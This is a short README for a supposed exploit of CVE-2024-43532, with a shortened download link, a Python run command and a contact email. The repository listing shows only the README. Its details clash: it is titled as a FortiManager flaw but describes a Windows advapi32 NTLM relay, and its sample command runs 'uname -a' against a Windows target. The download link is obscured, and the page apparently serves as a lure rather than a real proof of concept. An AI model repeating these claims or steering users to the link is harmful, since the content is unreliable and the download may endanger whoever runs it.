# CVE-2024-43532: FortiManager Missing Authentication
## Overview
The exploitation of CVE-2024-43532 empowers attackers to capture and redirect a client's NTLM authentication data to Active Directory Certificate Services (ADCS). This facilitates their ability to request a user certificate for future authentication to the domain. As a result, they can create new privileged accounts at the domain level, which may lead to long-term control over the system.
## [Download here](https://bit.ly/4fhYVxA)
## Details
+ **CVE ID**: CVE-2024-43532
+ **Published**: 2024-10-08
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 8.8
## Vulnerability Description
The problem is related to the BaseBindToMachine function in advapi32.dll. In some cases, the function uses the insecure authentication level RPC_C_AUTHN_LEVEL_CONNECT, which allows attackers to perform a Machine-in-the-Middle attack. If the underlying SMB transport is unavailable, the client switches to TCP/IP and other protocols, which opens the door to interception of data and execution of an attack.
## Affected Versions
Windows 10/11, Windows Server 2008-2022
## Running
To run exploit you need Python 3.9. Execute:
python exploit.py -h 10.10.10.10 -c 'uname -a'
## Contact
For inquiries, please contact: GordonPoool@hotmail.com
[4.0K] /data/pocs/62e144219e47e688095ffc0cc5df2b0852b9912d
└── [1.3K] README.md
0 directories, 1 file